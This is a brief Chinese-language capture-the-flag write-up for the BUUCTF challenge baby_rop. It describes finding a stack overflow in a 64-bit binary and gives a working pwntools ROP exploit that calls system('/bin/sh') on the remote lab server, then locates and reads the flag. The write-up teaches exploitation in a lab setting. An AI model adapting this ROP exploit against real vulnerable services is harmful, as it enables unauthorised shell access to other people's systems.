buuctf|[HarekazeCTF2019]baby_rop 1
分析
下载文件重命名为pwn_15,checksec一下
只开启了NX,64位,用ida看看
这里可以栈溢出,同时在侧面看到了system()
shift+F12查看字符串
找到binsh,由于是64位,我们要寄存器传参,ROPgadget下
exp如下
from pwn import*
p=remote('node4.buuoj.cn',25977)
#p=process("./pwn_15")
system_addr=0x400490
binsh_addr=0x601048
ret_addr=0x400479
popdi_addr=0x400683
payload=b'A'*0x18+p64(ret_addr)+p64(popdi_addr)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload)
p.interactive()
flag
拿到控制权后
find -name flag
找到地址后cat,得flag